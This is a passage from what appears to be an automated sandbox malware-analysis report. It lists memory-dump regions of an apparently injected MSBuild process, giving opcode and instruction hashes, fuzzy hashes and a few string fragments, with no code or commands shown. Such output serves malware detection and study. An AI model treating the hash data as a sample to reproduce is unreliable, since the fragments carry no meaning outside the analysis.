                          • Instruction ID: 1c58718764d04a3461237895dde75a277c62c7abdde58007285d1b56eba631f9
                          • Opcode Fuzzy Hash: b5118d9bcae30a18404af6608a3dc7c34877b0a7b6c7a1cb788a10fe605b2c25
                          • Instruction Fuzzy Hash: 5DD0A9712003045FE300CB8CDC42B22B7B8EB98A24F00C16CA858CB391EB32EC03CA60
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: aa566b557b8920d9ea8fe13de2da28fe2b80b1847046967d96d5969b359f7fba
                          • Instruction ID: 0af93c36f4a1924855e42be680a69d5620cf3cad3dcaaa2ccb9f0bed37bbc93c
                          • Opcode Fuzzy Hash: aa566b557b8920d9ea8fe13de2da28fe2b80b1847046967d96d5969b359f7fba
                          • Instruction Fuzzy Hash: 91C002312881255FE249D598DD43B58BB79D794628F9881BDB408DB392DB2BE8134584
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1263342ddc8fc088c07e816f203dd84e8c4ea0b83d286e60aa808a74227083bf
                          • Instruction ID: f051710e0c0335ef9ee4c536da891cf566c031bb1e37a1a3da2ffc368760d9e2
                          • Opcode Fuzzy Hash: 1263342ddc8fc088c07e816f203dd84e8c4ea0b83d286e60aa808a74227083bf
                          • Instruction Fuzzy Hash: C5D05B7074C11DCFDB3CDF25E054636225BBBD8304F2580258E02CB18CEE358D418785
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b3b34e036739ad80b8eae71fa985a5b6f48181e9400e0000bd70ecb3f4e453b8
                          • Instruction ID: 8fb42414b3a74cc3503d10e862efbe0636182d2141ab55bf50512b6cea971ce6
                          • Opcode Fuzzy Hash: b3b34e036739ad80b8eae71fa985a5b6f48181e9400e0000bd70ecb3f4e453b8
                          • Instruction Fuzzy Hash: EED0C77295510CEB8B01EFF4DA0085E7BFDDF552007504DE9D50497110EE759B1057D1
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0c1a0ed66a11b8562fb1ea0ad91d10a8a4df215a7317af9ad335074d6cf2de0d
                          • Instruction ID: f2cb57e991ad817d4feb9652b20b07369a0c5905a4d85aeeb2999d273f6f1dde
                          • Opcode Fuzzy Hash: 0c1a0ed66a11b8562fb1ea0ad91d10a8a4df215a7317af9ad335074d6cf2de0d
                          • Instruction Fuzzy Hash: 2AD0A772B042041FC300C658CC55E52B794CB94A00B01C46DE508C7391ED22FD03CA54
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ef7ed3a3af64d0e7605ac6ca1ec4cbbaa440f0e9bb2d095dfabf151e1670020d
                          • Instruction ID: dedc844393b902c25dc06249b0a57052bf627db70d42e0e4fb0a593c9b0e5e40
                          • Opcode Fuzzy Hash: ef7ed3a3af64d0e7605ac6ca1ec4cbbaa440f0e9bb2d095dfabf151e1670020d
                          • Instruction Fuzzy Hash: 73C012352882141FC3058198DC41B987B56C7D4254F98C57CA408CBF92C72FDC034080
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 96832a0258eb2347740cecb8bf7fb407e8a26d3112957947d46d87c174ead708
                          • Instruction ID: 318233ab760e52758ac9533e4a4d5bdda80428d0b9bd74ee61dab4f5eed67baf
                          • Opcode Fuzzy Hash: 96832a0258eb2347740cecb8bf7fb407e8a26d3112957947d46d87c174ead708
                          • Instruction Fuzzy Hash: 4EE01230545209CBEF14DF90D554BAE7B32BF48304F600419D003BA284CF75598ACB91
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          • Opcode ID: 99ba0a580a62ae39fa2075cd6a9a13b292e3353ebfa504b30a2e1b961aca7f93
                          • Instruction ID: c9c2443c50598c4d58a3781e8784ab65157834692fbe1c2f6645c74c84c0c160
                          • Opcode Fuzzy Hash: 99ba0a580a62ae39fa2075cd6a9a13b292e3353ebfa504b30a2e1b961aca7f93
                          • Instruction Fuzzy Hash: 56D012B21882408FD300CFA4E844AA1BBB5AF28352B2A41A2E9048B3B2C222C810DB10
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 436519d329ffee139dca217eeab0b122bdc21bdd033732cb555a215e6954da4a
                          • Instruction ID: 5f918ac376ba407a71ed2639c3fcabe98a48e275434f65a5eb61f1e37bfaa97d
                          • Opcode Fuzzy Hash: 436519d329ffee139dca217eeab0b122bdc21bdd033732cb555a215e6954da4a
                          • Instruction Fuzzy Hash: D0C08C7310A248EFDB014BA1CE013563B729B10306F65802AE485884B1C33AC020DA11
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ea14ff07adee848553db91d577b6cf1cd1cf7113ba419d62e5c601fa7bbcfbdf
                          • Instruction ID: e540f02dddd128e4628e5d81a3ad8982afece811528e805acaf449dc291e7ece
                          • Opcode Fuzzy Hash: ea14ff07adee848553db91d577b6cf1cd1cf7113ba419d62e5c601fa7bbcfbdf
                          • Instruction Fuzzy Hash: D3B092312481186B8644D698ED92914B7A9DA9861A798C0ADA80CDB306CB73E8038588
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8560a482ac497427a2a0fd68da5e96cb49451c5455e49ccd8774a3df83acb071
                          • Instruction ID: 61af1cd37e4d7949c4734d545128ca45119aa572a817d18edc2b112072041238
                          • Opcode Fuzzy Hash: 8560a482ac497427a2a0fd68da5e96cb49451c5455e49ccd8774a3df83acb071
                          • Instruction Fuzzy Hash: CCC02BB28443092BD740069050803B7675C9F631A0F031866DC85D00A8E310C4018400
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1121650c72518f58f34cae4274d585866f196f0c2f5d10a8c0779d1d312693e7
                          • Instruction ID: 0a2113b5c9ccc15b103fb666036e47408cbdcb4bd4d3d02c9c0f04670e7a0d21
                          • Opcode Fuzzy Hash: 1121650c72518f58f34cae4274d585866f196f0c2f5d10a8c0779d1d312693e7
                          • Instruction Fuzzy Hash: 28B092312482085B8248D698E982914B7A9DAA8618398C0ADA80CDB302CB33E8038584
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1068af9ea5522c5b3545d709ec05237d4d6592fc72d85d5872d20f9dd948a636
                          • Instruction ID: 989a94997698165e41146865bcfd934838665b880d25ba0632b5b731292a2251
                          • Opcode Fuzzy Hash: 1068af9ea5522c5b3545d709ec05237d4d6592fc72d85d5872d20f9dd948a636
                          • Instruction Fuzzy Hash: 9EC092F38A51069BF7108AA1994B7C22B50DB30364F1A2821E88AC0694EA20E683803A
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                          • Instruction ID: 6946c9798f7289baa91495e0fb5539b78174b0423724991b48b9fdfa7c9b4558
                          • Opcode Fuzzy Hash: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                          • Instruction Fuzzy Hash: 02B012302081084F8244D6D8E841C14F39DDBC4618354C0ADE80CCB302CF33FC0385C4
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8fed6a9620c139db43c6b53ed32073dce0b0458b98a3a5697634af16c5615a42
                          • Instruction ID: 62bddc66cfa9a4287bd661d56e597f84fff71773d42dc4cb670cc4cc9d0054fc
                          • Opcode Fuzzy Hash: 8fed6a9620c139db43c6b53ed32073dce0b0458b98a3a5697634af16c5615a42
                          • Instruction Fuzzy Hash: C7C0923484524ADFD74207E8ACAA8E17FF5ED062A130802929C4166223E6E849A38A24
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                          • Instruction ID: 6946c9798f7289baa91495e0fb5539b78174b0423724991b48b9fdfa7c9b4558
                          • Opcode Fuzzy Hash: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                          • Instruction Fuzzy Hash: 02B012302081084F8244D6D8E841C14F39DDBC4618354C0ADE80CCB302CF33FC0385C4
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ec40219467fe1d369092f3d9fa17281cf384a320fb26c463175a9def7a5478be
                          • Instruction ID: f4c4109344dce20e08ffe1028c433b67b7a8869de7468cacf89ae16a2dbab272
                          • Opcode Fuzzy Hash: ec40219467fe1d369092f3d9fa17281cf384a320fb26c463175a9def7a5478be
                          • Instruction Fuzzy Hash: 24B012324C5B090FE3145FC8B8473407E594700322FC54164880CCA146C41DC1160384
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                          • Instruction ID: 6946c9798f7289baa91495e0fb5539b78174b0423724991b48b9fdfa7c9b4558
                          • Opcode Fuzzy Hash: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                          • Instruction Fuzzy Hash: 02B012302081084F8244D6D8E841C14F39DDBC4618354C0ADE80CCB302CF33FC0385C4
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                          • Instruction ID: 6946c9798f7289baa91495e0fb5539b78174b0423724991b48b9fdfa7c9b4558
                          • Opcode Fuzzy Hash: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                          • Instruction Fuzzy Hash: 02B012302081084F8244D6D8E841C14F39DDBC4618354C0ADE80CCB302CF33FC0385C4
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e1522fc20225fa68599cdae0c49a6082ddfa01f0efab3084b0003218148e02a5
                          • Instruction ID: 7f959f81369ea0ad1c5522bc6d24ec333c11818fdec8a44cc1750d1e008d7963
                          • Opcode Fuzzy Hash: e1522fc20225fa68599cdae0c49a6082ddfa01f0efab3084b0003218148e02a5
                          • Instruction Fuzzy Hash: 9EB0929784994105E70685A0EA433406B15EB8200AE5D1186A54898B12E0828D408189
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                          • Instruction ID: 6946c9798f7289baa91495e0fb5539b78174b0423724991b48b9fdfa7c9b4558
                          • Opcode Fuzzy Hash: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                          • Instruction Fuzzy Hash: 02B012302081084F8244D6D8E841C14F39DDBC4618354C0ADE80CCB302CF33FC0385C4
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                          • Instruction ID: 6946c9798f7289baa91495e0fb5539b78174b0423724991b48b9fdfa7c9b4558
                          • Opcode Fuzzy Hash: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                          • Instruction Fuzzy Hash: 02B012302081084F8244D6D8E841C14F39DDBC4618354C0ADE80CCB302CF33FC0385C4
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                          • Instruction ID: 6946c9798f7289baa91495e0fb5539b78174b0423724991b48b9fdfa7c9b4558
                          • Opcode Fuzzy Hash: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                          • Instruction Fuzzy Hash: 02B012302081084F8244D6D8E841C14F39DDBC4618354C0ADE80CCB302CF33FC0385C4
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                          • Instruction ID: 6946c9798f7289baa91495e0fb5539b78174b0423724991b48b9fdfa7c9b4558
                          • Opcode Fuzzy Hash: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                          • Instruction Fuzzy Hash: 02B012302081084F8244D6D8E841C14F39DDBC4618354C0ADE80CCB302CF33FC0385C4
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                          • Instruction ID: a5ced1602b898661de329531365079a034e3d75a808f59c5ffcbefa728424f66
                          • Opcode Fuzzy Hash: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                          • Instruction Fuzzy Hash: 58C0927A140208EFC700DF69E848C85BBB8EF1977171180A1FA088B332C732EC60DA94
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e5bbbe6d71fadea630d89b03003e7b4c3b62a6139065157876b46a06ed7cc6ed
                          • Instruction ID: 4278cb225c0f85bc63321415b8e4adb600ac72ca18e02a42b74823b63bbe1cca
                          • Opcode Fuzzy Hash: e5bbbe6d71fadea630d89b03003e7b4c3b62a6139065157876b46a06ed7cc6ed
                          • Instruction Fuzzy Hash: 4FB012718803049FC76806B4E04109E7378596135536240BFA80E543308B77D441C900
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 730abf103cc3b240bf25763d5c1c82728a73f263ba8f09bfc97d4940cb4d862d
                          • Instruction ID: a5cf1772d5f694b322c7559b6b4813ea6facbd5f6882f16f9f7828b760d1498f
                          • Opcode Fuzzy Hash: 730abf103cc3b240bf25763d5c1c82728a73f263ba8f09bfc97d4940cb4d862d
                          • Instruction Fuzzy Hash: 70C08C5250C3808F87014350AA053197A606652101B0C008AD958C10138028001882A3
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 00fb257517fa66d8d82df2fc559de156622b6f4f3f56d113648c417e124a9b6c
                          • Instruction ID: bde584bcc0a20163e1d20aefd562f14664055d751c7398f878511897cdc0a054
                          • Opcode Fuzzy Hash: 00fb257517fa66d8d82df2fc559de156622b6f4f3f56d113648c417e124a9b6c
                          • Instruction Fuzzy Hash: DFB012301042084B8100D6C8D841810F39CDB84518314C099980C47302CA23FC038580
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 86690605d3e26eaf021d98fb22e166ec89012dae8d5b18e4ab8be6d22f2b6097
                          • Instruction ID: 79d616839fc4d5ff98018b3bcaff8b96e5566e8ed2e524e1e4f05b6f5750f866
                          • Opcode Fuzzy Hash: 86690605d3e26eaf021d98fb22e166ec89012dae8d5b18e4ab8be6d22f2b6097
                          • Instruction Fuzzy Hash: 3DC04C71A0430C8BCB54DA95D44069D7671EB49210F2046158556EB245DB305C818B51
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a331f8f33039834f33c197f49bb623c631832da61b987b98a836115596ca487c
                          • Instruction ID: e62d7d1865fb23958f09facce06c2a2cc94799eff7bb348a75ff0a76795b41e4
                          • Opcode Fuzzy Hash: a331f8f33039834f33c197f49bb623c631832da61b987b98a836115596ca487c
                          • Instruction Fuzzy Hash: F6B01237B0001986CB14D6C8F4414DCFB30DBD4333F008033C300620008731157AC760
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f4e2839fb080d70fd9d5ab266c8ff45246f4c7246a28781672dbb782ec4b6ef3
                          • Instruction ID: cfd3c94acb28e12ede7e7a80c62375d018fe088f1f186957f4485c32e65079b3
                          • Opcode Fuzzy Hash: f4e2839fb080d70fd9d5ab266c8ff45246f4c7246a28781672dbb782ec4b6ef3
                          • Instruction Fuzzy Hash: 6CB092301602088F82009A59E448C0137ACAF08A0434100D0E1088B632C621F8008A51
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c8fc8c6125cd7017ae13da6f4036d9893a65866573e7f157e651c94b9eb46721
                          • Instruction ID: efe135f6421f9b42ec79872326fabcfe8fbcfa060a1b1959e853e74daba683db
                          • Opcode Fuzzy Hash: c8fc8c6125cd7017ae13da6f4036d9893a65866573e7f157e651c94b9eb46721
                          • Instruction Fuzzy Hash: 4CC00235D05218CBDB40CF90D84469EBF72BB48311F208665D929A3390D6359C56CB40
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 970426c1acde936bf39dc437c07016d350ede9486bce2106a00bf11ece082963
                          • Instruction ID: c266a4e435561aba3cd45e996d5b7cfc4d79604aa6c6b72393e44ee7ff38245f
                          • Opcode Fuzzy Hash: 970426c1acde936bf39dc437c07016d350ede9486bce2106a00bf11ece082963
                          • Instruction Fuzzy Hash: 69A0243304034D43CF1013C5DC0C3F5730DF740113F0D4070740C00C0155D070400055
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 66a3fed3524d0e3b6aa34297025c286ac4a80428def4d264536e31cd63fcc3cc
                          • Instruction ID: ef242089091a22f9fd60773d12e65ea1cddc4a3d71f3d920546a8db1f1f5bae4
                          • Opcode Fuzzy Hash: 66a3fed3524d0e3b6aa34297025c286ac4a80428def4d264536e31cd63fcc3cc
                          • Instruction Fuzzy Hash: 7AB0123200010CA786005B42EC0498ABF1CD7142727004121F90404030C773E4609595
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c9a85108df22d909dbce6abaa8e3cafe8f0fd0501d7a90532ee9daec6175c400
                          • Instruction ID: 8dbb55a752bc4e3d0f0e7bb1fb977e4db967234c4dcc383dba9df53563c3d6e7
                          • Opcode Fuzzy Hash: c9a85108df22d909dbce6abaa8e3cafe8f0fd0501d7a90532ee9daec6175c400
                          • Instruction Fuzzy Hash: DAB012939845480DE35002E05E6174ABA0F8750303F5A019FA45C559A2841AC0380866
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 58da1fedc9e38cddb800cbfdfff484f664adbecd91922e6d585f9b80a7697763
                          • Instruction ID: b00412a48049eed6a954916b183e8f8396f8bc9d072b109be15c46b1cdfa0731
                          • Opcode Fuzzy Hash: 58da1fedc9e38cddb800cbfdfff484f664adbecd91922e6d585f9b80a7697763
                          • Instruction Fuzzy Hash: 7990023204464CCF49406796A809B6EB76CA5546157904051B60DC65125E75645045E5
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 790b3d4858357a0ffdc90ed9cb310faf1f5ba90a580e7b33a43fa9efbb10ca3d
                          • Instruction ID: 6d117ff228b1f6cdc5da47e2ed1a055e864c749fa055f2ea88d54eaf3398fe46
                          • Opcode Fuzzy Hash: 790b3d4858357a0ffdc90ed9cb310faf1f5ba90a580e7b33a43fa9efbb10ca3d
                          • Instruction Fuzzy Hash:
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: $A$E$T$U
                          • API String ID: 0-1503325869
                          • Opcode ID: 1d44f73d806021ede265588253ca2a9862a0e56185fddd1c5d3ddd8985db01a5
                          • Instruction ID: 781f8b783488ccce411236f002b4c914dd49e129dc4b1fa4cf6958ff688a78b4
                          • Opcode Fuzzy Hash: 1d44f73d806021ede265588253ca2a9862a0e56185fddd1c5d3ddd8985db01a5
                          • Instruction Fuzzy Hash: 0A12B170E002458FDF11DB68C985BBEBBB3AF85304F09C499D0566B29ADB34D886CB91
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: (_jq$(_jq$(_jq$(_jq
                          • API String ID: 0-437935255
                          • Opcode ID: 6bb03151b00f114df8a2392ca51cc682b34d7ed1681022c59dae1286e6a8d0aa
